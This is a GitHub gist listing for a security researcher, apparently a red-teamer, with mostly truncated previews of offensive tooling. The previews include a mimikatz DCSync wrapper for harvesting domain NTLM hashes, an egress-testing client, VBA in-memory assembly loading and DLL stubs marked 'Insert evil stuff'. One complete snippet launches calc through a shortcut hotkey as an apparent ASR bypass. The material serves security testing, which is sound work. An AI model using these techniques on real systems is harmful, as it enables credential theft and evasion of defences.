I hereby claim:
- I am monoxgas on github.
- I am monoxgas (https://keybase.io/monoxgas) on keybase.
- I have a public key ASCY7hWSUiJvdx6-976NCpVJx_ePWPOc6E3cuJz5PA8dygo
To claim this, I am signing this object:
Nick Landers monoxgas
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-DCSync | |
| { | |
| <# | |
| .SYNOPSIS | |
| Uses dcsync from mimikatz to collect NTLM hashes from the domain. | |
| Author: @monoxgas | |
| Improved by: @harmj0y |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # Rulz.py | |
| # Author: Nick Landers (@monoxgas) - Silent Break Security | |
| import os | |
| import sys | |
| import argparse | |
| import re | |
| import binascii | |
| import codecs |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-EgressAssess | |
| { | |
| <# | |
| .Synopsis | |
| Egress-assess powershell client. | |
| .Description | |
| This script will connect to an Egress-assess server and transfer faux Personally Identifiable Information or |
monoxgas
/ shortcut.ps1
Last active
May 29, 2020 14:49
Execute something under svchost.exe using shortcut hotkeys (ASR bypass?)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Shell = New-Object -Com WScript.Shell | |
| $S = $Shell.CreateShortcut("$($Env:AppData)\Microsoft\Windows\Start Menu\default.lnk") | |
| $S.TargetPath = "calc.exe" | |
| $S.Hotkey = "Ctrl+U" | |
| $S.Save() | |
| $Shell.SendKeys("^u") | |
| Start-Sleep 10;rm "$($Env:AppData)\Microsoft\Windows\Start Menu\default.lnk" |
monoxgas
/ mscorlib_load_assembly.vba
Last active
May 18, 2023 13:30
VBA code for calling AppDomain.Load using raw vtable lookups for the IUnknown
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb | |
| Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long | |
| Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr) | |
| Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr | |
| #If Win64 Then | |
| Const LS As LongPtr = 8& | |
| #Else | |
| Const LS As LongPtr = 4& |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <intrin.h> | |
| #include <string> | |
| #include <TlHelp32.h> | |
| #include <psapi.h> | |
| DWORD WINAPI Thread(LPVOID lpParam) { | |
| // Insert evil stuff | |
| ExitProcess(0); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <intrin.h> | |
| #include <string> | |
| #include <TlHelp32.h> | |
| #include <psapi.h> | |
| BOOL PatchTheRet(HMODULE realModule) { | |
| // Get primary module info |
monoxgas
/ keybase.md
Created
August 11, 2020 19:03
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import struct | |
| import binascii | |
| from itertools import cycle, zip_longest | |
| from operator import itemgetter, xor | |
| from collections import Counter | |
| import re | |
| # Some root key constants from the binary |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // ref: https://opensource.apple.com/source/dyld/[VERSION]/launch-cache/dsc_extractor.cpp.auto.html | |
| // > SDKROOT=`xcrun --sdk macosx --show-sdk-path` | |
| // > clang++ -o extract extract.cpp | |
| // > mkdir libraries | |
| // > ./extract /System/Library/dyld/dyld_shared_cache_x86_64 `pwd`/libraries/ | |
| #include <stdio.h> | |
| #include <stddef.h> | |
| #include <dlfcn.h> |